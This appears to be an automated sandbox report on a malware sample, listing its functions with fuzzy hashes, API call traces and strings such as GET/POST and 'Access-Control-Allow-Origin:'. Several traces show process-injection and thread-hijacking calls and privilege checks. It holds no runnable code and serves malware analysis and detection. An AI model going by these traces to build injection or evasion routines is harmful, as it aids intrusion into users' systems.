  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE6E9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123 Total matches: 37
Similarity
  • Total matches: 37
  • API ID: GetLastErrorGetVersion
  • String ID: GET$POST
  • API String ID: 2325875326-3192705859
  • Opcode ID: 26b0fd4c2e62fc57389cc46e4c3039c84c7b440f69484f47d42f00f4ba49821f
  • Instruction ID: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
  • Opcode Fuzzy Hash: BC014CB305DC52EBD17BB6950006FB39B84DF12AF6CDC611079816A3DCBE8072355B40
  • Instruction Fuzzy Hash: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
APIs
    • Part of subcall function 001D9640: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001DE6F9,00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000), ref: 001D9649
    • Part of subcall function 001D9640: mbstowcs.NTDLL ref: 001D9670
    • Part of subcall function 001D9640: memset.NTDLL ref: 001D9682
  • GetVersion.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE705
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE834
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
